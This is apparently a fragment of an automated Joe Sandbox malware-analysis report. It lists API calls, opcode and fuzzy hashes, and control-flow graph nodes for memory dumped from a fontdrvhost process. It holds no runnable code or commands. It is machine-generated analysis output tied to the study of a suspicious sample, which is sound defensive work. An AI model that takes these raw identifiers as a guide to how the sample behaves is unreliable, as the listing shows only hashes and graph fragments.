                                                                                                                                                                                                          • API ID: AcceptConnectPort
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1658770261-0
                                                                                                                                                                                                          • Opcode ID: 275693e7d66e5d53f7e2184dfa7c88ce453f9d9d0d3e8ba4525500231a394657
                                                                                                                                                                                                          • Instruction ID: 526b0c1750d153eb03844e3f04a50ce43b85992e8713838ee3d25989997f73c0
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 275693e7d66e5d53f7e2184dfa7c88ce453f9d9d0d3e8ba4525500231a394657
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8351473155CE280AE36CA63C889927EBBD4FB8134DF34015ED0F3C5097D938D9868B82

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000001C.00000002.2033082515.00000205BFC30000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000205BFC30000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_28_2_205bfc30000_fontdrvhost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AcceptConnectPort$MitigationPolicyProcess
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2923266908-0
                                                                                                                                                                                                          • Opcode ID: e7c877b781110a0d6e647df344fb2e40eb660a4b7f668a210715c22aed20397b
                                                                                                                                                                                                          • Instruction ID: 31ca26eb0c3b3e229a3f5d1cd3dfff5be5049b634ab3c4f8ecbbc124f0d8677e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e7c877b781110a0d6e647df344fb2e40eb660a4b7f668a210715c22aed20397b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6C41F330608F488FDB44DF2C988979A7BD1EB55320F0443AEE85ACB2D7DA34D9498795

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 118 205bfc315c0-205bfc315f2 119 205bfc315f9-205bfc315fb 118->119 120 205bfc315f4-205bfc315f7 118->120 122 205bfc3160b-205bfc3160d 119->122 123 205bfc315fd-205bfc31609 119->123 121 205bfc3161f-205bfc3166d NtAcceptConnectPort 120->121 124 205bfc3160f-205bfc3161b 122->124 125 205bfc3161d 122->125 123->121 124->121 125->121
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • NtAcceptConnectPort.NTDLL(?,?,?,?,?,?,?,?,00000000,00000205BFC31E3A), ref: 00000205BFC31654
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000001C.00000002.2033082515.00000205BFC30000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000205BFC30000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_28_2_205bfc30000_fontdrvhost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AcceptConnectPort
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1658770261-0
                                                                                                                                                                                                          • Opcode ID: 1eb38bd4e9810c4692bda8c47b34b9a63fb6abd40dd4841afe63035e04063970
                                                                                                                                                                                                          • Instruction ID: 4785d219b8caa342f600e090df0388cdecd96209280686c90f60986cb723319f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1eb38bd4e9810c4692bda8c47b34b9a63fb6abd40dd4841afe63035e04063970
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4A21817190CB188FDB58DF58C4C9A6ABBE5FB68349F040A3EE44AC7261D731E884CB41

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 95 205bfc31870-205bfc318a0 call 205bfc308a4 * 2 100 205bfc318a6-205bfc318a9 95->100 101 205bfc31954-205bfc3195b 95->101 100->101 102 205bfc318af-205bfc318b9 100->102 102->101 103 205bfc318bf-205bfc318c4 102->103 103->101 104 205bfc318ca-205bfc318d7 103->104 104->101 105 205bfc318d9-205bfc318e1 104->105 105->101 106 205bfc318e3-205bfc318ee 105->106 106->101 107 205bfc318f0-205bfc318f7 106->107 107->101 108 205bfc318f9-205bfc318fc 107->108 108->101 109 205bfc318fe-205bfc31906 108->109 109->101 110 205bfc31908-205bfc3190b 109->110 110->101 111 205bfc3190d-205bfc31916 110->111 111->101 112 205bfc31918-205bfc3191c 111->112 112->101 113 205bfc3191e-205bfc3192e 112->113 113->101 115 205bfc31930-205bfc31947 GetProcessMitigationPolicy 113->115 115->101 116 205bfc31949-205bfc3194e 115->116 116->101 117 205bfc31950-205bfc31951 116->117 117->101
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000001C.00000002.2033082515.00000205BFC30000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000205BFC30000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_28_2_205bfc30000_fontdrvhost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MitigationPolicyProcess
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1088084561-0
                                                                                                                                                                                                          • Opcode ID: 26f3b5b73fc16ab59c2c5e195c9b4eeee4e831d251455a47b6c64e26f9aa79e3
                                                                                                                                                                                                          • Instruction ID: 742030d34da1c922cf309a2c2b6dc82cec32b19f4217be7a84c75b5fbc5c6e6e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 26f3b5b73fc16ab59c2c5e195c9b4eeee4e831d251455a47b6c64e26f9aa79e3
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1431CC30508F2F8EEBA59B6984987FA76D0EB4439CF141169C015D30DEEA35EDC9CB40
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000001C.00000002.2033082515.00000205BFC30000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000205BFC30000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_28_2_205bfc30000_fontdrvhost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 247c94ababd4710b0196191072c8bbb5758b71c13019f7a788401a9348e82e18
                                                                                                                                                                                                          • Instruction ID: 1684949b0e2b346c4f6e13502068689c61c9b2d028cdf62c4328b71d82623ec0
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 247c94ababd4710b0196191072c8bbb5758b71c13019f7a788401a9348e82e18
                                                                                                                                                                                                          • Instruction Fuzzy Hash: CFB01130E2AA00C2E3880E0AB8023A0F2B2C30B300F02B2322002F3220CA28CC08028F